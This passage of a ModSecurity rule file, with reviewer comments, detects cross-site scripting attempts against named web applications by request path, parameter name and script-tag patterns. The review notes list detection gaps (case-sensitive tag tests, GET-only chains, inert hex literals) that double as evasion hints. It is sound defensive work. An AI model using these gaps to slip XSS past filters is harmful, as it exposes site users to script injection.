# NOTE(review): &TX:'/XSS.*ARGS:ote_home/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "ote_home" are counted too.
SecRule REQUEST_LINE "@contains /skins/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003878,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Open Translation Engine (OTE) XSS Attempt -- header.php ote_home',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3838'"
SecRule &TX:'/XSS.*ARGS:ote_home/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Open Translation Engine (OTE) XSS Attempt -- header.php ote_home',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011268) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Oracle Business Process Management context Parameter Cross Site Scripting Attempt
# NOTE(review): same unanchored TX-name count as above, here for "context".
SecRule REQUEST_LINE "@contains /faces/jsf/tips.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011268,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Oracle Business Process Management context Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule &TX:'/XSS.*ARGS:context/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Oracle Business Process Management context Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003879) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- settings.php catid
SecRule REQUEST_LINE "@contains /settings.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003879,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- settings.php catid',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23761'"
SecRule &TX:'/XSS.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- settings.php catid',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2003880) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- cat.php catid
# NOTE(review): &TX:'/XSS.*ARGS:catid/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "catid" are counted too.
# "@contains /cat.php" is a substring test on the whole request line, so the
# path check is also satisfied when "/cat.php" appears in the query string.
SecRule REQUEST_LINE "@contains /cat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003880,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- cat.php catid',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23761'"
SecRule &TX:'/XSS.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPChain XSS Attempt -- cat.php catid',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2001218) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHPNuke general XSS attempt
# NOTE(review): same unanchored TX-name count as above, here for "name".
SecRule REQUEST_LINE "@contains /modules.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2001218,rev:11,msg:'SLR: ET WEB_SPECIFIC_APPS PHPNuke general XSS attempt',tag:'web-application-attack',tag:'url,www.waraxe.us/?modname=sa&id=030'"
SecRule &TX:'/XSS.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHPNuke general XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004582) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS 
Particle Gallery XSS Attempt -- search.php order
# NOTE(review): &TX:'/XSS.*ARGS:order/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "order" are counted too.
# "@contains /search.php" is a generic path, so this application-specific rule
# is evaluated for any application that serves a search.php.
SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004582,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Particle Gallery XSS Attempt -- search.php order',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469985/100/0/threaded'"
SecRule &TX:'/XSS.*ARGS:order/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Particle Gallery XSS Attempt -- search.php order',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003914) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Podium CMS XSS Attempt -- Default.aspx id
# NOTE(review): same unanchored TX-name count as above; with a name as short as
# "id" the pattern also counts every parameter whose name starts with "id".
SecRule REQUEST_LINE "@contains /Default.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003914,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Podium CMS XSS Attempt -- Default.aspx id',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/467823/100/0/threaded'"
SecRule &TX:'/XSS.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Podium CMS XSS Attempt -- Default.aspx id',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011117) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PowerEasy ComeUrl Parameter Cross Site Scripting Attempt
SecRule REQUEST_LINE "@contains /user/User_ChkLogin.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011117,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS PowerEasy ComeUrl Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,39696'"
SecRule &TX:'/XSS.*ARGS:ComeUrl/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS 
PowerEasy ComeUrl Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2009672) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS programsrating rate.php id XSS attempt
# NOTE(review): three precision/coverage points in this chain:
#  - ARGS_NAMES "(?i:id)" is unanchored, so any parameter name that merely
#    contains "id" satisfies it, not only a parameter called "id".
#  - "@contains GET " limits the chain to request lines containing that literal,
#    so the same payload sent with another method is not covered.
#  - "@contains <script>" and "@contains </script>" are case-sensitive literal
#    tests, and the decode transformations are declared on the first link only;
#    confirm whether upper-case or URL-encoded tags are meant to be caught.
SecRule REQUEST_LINE "@contains /rating/rate.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009672,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS programsrating rate.php id XSS attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0907-exploits/programsrating-xss.txt'"
SecRule ARGS_NAMES "(?i:id)" "chain"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains <script>" "chain"
SecRule REQUEST_LINE "@contains </script>" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS programsrating rate.php id XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2009673) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS programsrating postcomments.php id XSS attempt
# NOTE(review): same chain shape as 2009672 above, so the same three points
# apply (unanchored "id", GET-only, case-sensitive literal script tags).
SecRule REQUEST_LINE "@contains /rating/postcomments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009673,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS programsrating postcomments.php id XSS attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0907-exploits/programsrating-xss.txt'"
SecRule ARGS_NAMES "(?i:id)" "chain"
SecRule REQUEST_LINE "@contains GET " "chain"
SecRule REQUEST_LINE "@contains <script>" "chain"
SecRule REQUEST_LINE "@contains </script>" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS programsrating postcomments.php id XSS attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004587) SpiderLabs 
Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- awards.php
# NOTE(review): "@contains | 3C |" and "@contains | 3E |" test for those literal
# six-character strings. They look like Snort-style hex byte notation (0x3C is
# "<", 0x3E is ">") carried over from the source signature; as written the chain
# would only match a request line containing the text "| 3C |", so it likely
# never fires on an actual "<SCRIPT>" payload. Confirm and, if so, test for the
# "<" and ">" characters instead. "@contains SCRIPT" is also case-sensitive.
SecRule REQUEST_LINE "@contains /awards.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004587,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- awards.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469260/100/0/threaded'"
SecRule REQUEST_LINE "@contains | 3C |" "chain"
SecRule REQUEST_LINE "@contains SCRIPT" "chain"
SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- awards.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004588) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- login.php
# NOTE(review): same literal "| 3C |" / "| 3E |" tests as in 2004587 above; the
# chain is likely inert for the same reason. "/login.php" is a generic path.
SecRule REQUEST_LINE "@contains /login.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004588,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- login.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469260/100/0/threaded'"
SecRule REQUEST_LINE "@contains | 3C |" "chain"
SecRule REQUEST_LINE "@contains SCRIPT" "chain"
SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- login.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004589) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- register.php
SecRule REQUEST_LINE "@contains /register.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004589,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- 
register.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469260/100/0/threaded'"
SecRule REQUEST_LINE "@contains | 3C |" "chain"
SecRule REQUEST_LINE "@contains SCRIPT" "chain"
SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- register.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2004590) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- weapons.php
# NOTE(review): "@contains | 3C |" and "@contains | 3E |" test for those literal
# six-character strings. They look like Snort-style hex byte notation (0x3C is
# "<", 0x3E is ">") carried over from the source signature; as written the chain
# would only match a request line containing the text "| 3C |", so it likely
# never fires on an actual "<SCRIPT>" payload. Confirm and, if so, test for the
# "<" and ">" characters instead. "@contains SCRIPT" is also case-sensitive.
# The register.php links directly above use the same literals.
SecRule REQUEST_LINE "@contains /weapons.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004590,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- weapons.php',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469260/100/0/threaded'"
SecRule REQUEST_LINE "@contains | 3C |" "chain"
SecRule REQUEST_LINE "@contains SCRIPT" "chain"
SecRule REQUEST_LINE "@contains | 3E |" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PsychoStats XSS Attempt -- weapons.php',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004571) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RM EasyMail Plus XSS Attempt -- Login d
SecRule REQUEST_LINE "@contains cp/ps/Main/login/Login" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004571,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS RM EasyMail Plus XSS Attempt -- Login d',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25326'"
SecRule &TX:'/XSS.*ARGS:d/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RM EasyMail Plus XSS Attempt -- Login 
d',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2003872) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- searchloop.php s
# NOTE(review): &TX:'/XSS.*ARGS:s/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, and with a
# one-letter name it counts every parameter whose name starts with "s", so
# the chain is not limited to the "s" parameter named in the rule title.
SecRule REQUEST_LINE "@contains /wp-content/themes/redoable/searchloop.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003872,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- searchloop.php s',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468892/100/0/threaded'"
SecRule &TX:'/XSS.*ARGS:s/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- searchloop.php s',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003873) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- header.php s
# NOTE(review): same unanchored one-letter TX-name count as above.
SecRule REQUEST_LINE "@contains /wp-content/themes/redoable/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003873,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- header.php s',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/468892/100/0/threaded'"
SecRule &TX:'/XSS.*ARGS:s/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Redoable XSS Attempt -- header.php s',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003871) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ripe Website Manager XSS Attempt -- index.php ripeformpost
SecRule REQUEST_LINE "@contains /contact/index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003871,rev:5,msg:'SLR: ET 
WEB_SPECIFIC_APPS Ripe Website Manager XSS Attempt -- index.php ripeformpost',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23597'"
SecRule &TX:'/XSS.*ARGS:ripeformpost/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ripe Website Manager XSS Attempt -- index.php ripeformpost',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2011731) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter Cross Site Scripting Attempt
# NOTE(review): &TX:'/XSS.*ARGS:session/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "session" are counted too.
SecRule REQUEST_LINE "@contains /html/studentmain.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011731,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter Cross Site Scripting Attempt',tag:'web-application-attack',tag:'bugtraq,40737'"
SecRule &TX:'/XSS.*ARGS:session/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003922) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Sendcard XSS Attempt -- sendcard.php form
# NOTE(review): same unanchored TX-name count as above, here for "form".
SecRule REQUEST_LINE "@contains /sendcard.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003922,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Sendcard XSS Attempt -- sendcard.php form',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/25085'"
SecRule &TX:'/XSS.*ARGS:form/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Sendcard XSS Attempt -- sendcard.php form',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003881) SpiderLabs Research (SLR) 
Public Vulns: ET WEB_SPECIFIC_APPS SonicBB XSS Attempt -- search.php part
# NOTE(review): &TX:'/XSS.*ARGS:part/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "part" are counted too.
SecRule REQUEST_LINE "@contains /search.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003881,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SonicBB XSS Attempt -- search.php part',tag:'web-application-attack',tag:'url,www.netvigilance.com/advisory0020'"
SecRule &TX:'/XSS.*ARGS:part/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SonicBB XSS Attempt -- search.php part',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2011065) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SurgeFTP surgeftpmgr.cgi classid Parameter Cross Site Scripting Attempt
# NOTE(review): same unanchored TX-name count as above, here for "classid".
# The middle link requires the literal "cmd=class&", i.e. the cmd parameter
# must be followed by another parameter for the chain to match.
SecRule REQUEST_LINE "@contains /cgi/surgeftpmgr.cgi" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011065,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SurgeFTP surgeftpmgr.cgi classid Parameter Cross Site Scripting Attempt',tag:'web-application-attack'"
SecRule REQUEST_LINE "@contains cmd=class&" "chain"
SecRule &TX:'/XSS.*ARGS:classid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SurgeFTP surgeftpmgr.cgi classid Parameter Cross Site Scripting Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003902) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Apache Tomcat XSS Attempt -- implicit-objects.jsp
SecRule REQUEST_LINE "@contains /implicit-objects.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003902,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Apache Tomcat XSS Attempt -- implicit-objects.jsp',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1729'"
SecRule 
QUERY_STRING|REQUEST_BODY "(?i:<?(java|vb)?script>?.*<.+\/script>?)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Apache Tomcat XSS Attempt -- implicit-objects.jsp',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.

# (2004575) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Tomcat XSS Attempt -- hello.jsp test
# NOTE(review): &TX:'/XSS.*ARGS:test/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "test" are counted too.
SecRule REQUEST_LINE "@contains /appdev/sample/web/hello.jsp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004575,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Tomcat XSS Attempt -- hello.jsp test',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24058'"
SecRule &TX:'/XSS.*ARGS:test/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Tomcat XSS Attempt -- hello.jsp test',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2004558) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Track+ XSS Attempt -- reportItem.do projId
# NOTE(review): same unanchored TX-name count as above, here for "projId".
SecRule REQUEST_LINE "@contains /reportItem.do" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004558,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Track+ XSS Attempt -- reportItem.do projId',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24060'"
SecRule &TX:'/XSS.*ARGS:projId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Track+ XSS Attempt -- reportItem.do projId',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003917) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TurnkeyWebTools SunShop Shopping Cart XSS Attempt -- index.php l
SecRule REQUEST_LINE "@contains /index.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003917,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TurnkeyWebTools SunShop Shopping Cart XSS Attempt -- index.php l',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23856'"
SecRule &TX:'/XSS.*ARGS:l/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TurnkeyWebTools SunShop Shopping Cart XSS Attempt -- index.php l',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# Review notes: the first SecRule of each chain carries phase, id, msg and the
# "block" action; the setvar actions sit on the last link, so the anomaly score
# is raised only when every link of the chain matched.
# NOTE(review): the 2003917 link directly above counts TX names matching
# '/XSS.*ARGS:l/', which is unanchored and so covers every parameter whose name
# starts with "l"; combined with the generic "/index.php" path test this chain
# is far broader than the single "l" parameter named in its title.

# (2003888) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseCat.php catFile
# NOTE(review): &TX:'/XSS.*ARGS:catFile/' counts TX variables whose names match the
# regex. Nothing in this chain sets them, so it presumably relies on XSS rules
# that ran earlier (verify ordering). The regex has no end anchor, so longer
# parameter names beginning with "catFile" are counted too.
SecRule REQUEST_LINE "@contains /browseCat.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003888,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseCat.php catFile',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3887'"
SecRule &TX:'/XSS.*ARGS:catFile/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseCat.php catFile',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/XSS-%{matched_var_name}=%{matched_var}'"

# (2003889) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS TutorialCMS (Photoshop Tutorials) XSS Attempt -- browseSubCat.php catFile
